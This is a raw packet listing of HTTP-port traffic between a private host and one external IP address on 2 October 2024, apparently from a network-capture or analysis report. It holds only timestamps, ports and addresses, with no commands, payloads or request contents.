                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415149927 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415149927 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415450096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415468931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415478945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415488958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415498972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415507078 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415508986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415518999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415529966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415535927 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415540934 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415550947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415555000 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415561914 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415571928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415591955 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415613890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415884018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415894985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415904999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415915966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415926933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415927887 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415936947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415946960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415956020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415956020 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415966034 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415975094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415992975 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416022062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416030884 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416043043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416054010 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416060925 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416063070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416074038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416075945 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416083097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416093111 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416101933 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416102886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416111946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416122913 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416132927 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416132927 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416142941 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416148901 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416152954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416183949 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416856050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416867018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416877031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416887999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416888952 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416898012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416908026 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416908979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416918993 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416929007 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416934967 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416939974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416949987 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416959047 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416960955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416971922 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416982889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416985989 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.416994095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.417162895 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447484016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447504044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447521925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447530985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447535992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447541952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447551966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447562933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447567940 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.447604895 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.503864050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.503876925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.503886938 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.503925085 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504004955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504014969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504024982 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504036903 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504043102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504062891 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504194975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504210949 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504220009 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504245043 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504271984 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504312992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504323006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504333973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504343987 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504355907 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504383087 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504523993 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504534006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504543066 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504553080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504556894 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504563093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504573107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504582882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504599094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504623890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504776001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504786015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504796028 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504820108 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504837990 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504847050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504857063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504867077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504877090 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504885912 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.504909992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505151033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505160093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505170107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505181074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505189896 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505191088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505209923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505357981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505368948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505378962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505388975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505393028 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505398989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505409002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505415916 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505425930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505429983 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505435944 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505445957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505455017 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505455971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505465984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505475044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505477905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505486012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505494118 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505496025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505506039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505511045 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505521059 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505548954 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505933046 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505944014 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505954027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.505978107 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506002903 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506072044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506083012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506093979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506103992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506113052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506113052 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506124020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506133080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506134987 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506143093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506153107 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506153107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506164074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506174088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506174088 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506192923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506217003 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506228924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506238937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506248951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506258011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506258965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506283045 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506294966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506297112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506306887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506315947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506325960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506335020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506344080 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506344080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506366968 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.506383896 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507040977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507050991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507067919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507076979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507082939 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507114887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507119894 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507126093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507136106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507144928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507153988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507164001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507165909 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507174015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507186890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507193089 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507239103 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507632017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507642984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507652998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507669926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507675886 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507679939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507689953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507699966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507707119 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507723093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507729053 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507734060 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507742882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507751942 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507752895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507761955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507771015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507776976 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507781029 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507790089 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507800102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507801056 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507808924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507817984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507819891 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507828951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507838011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507838011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507848024 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507858992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507862091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507864952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.507893085 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538009882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538033962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538044930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538058043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538064957 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538074017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538096905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538119078 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538151979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538162947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538172960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.538197041 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.585403919 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594449043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594455004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594465971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594501972 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594541073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594547033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594558001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594563007 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594568014 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594598055 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594625950 CEST4971180192.168.2.6147.45.44.104
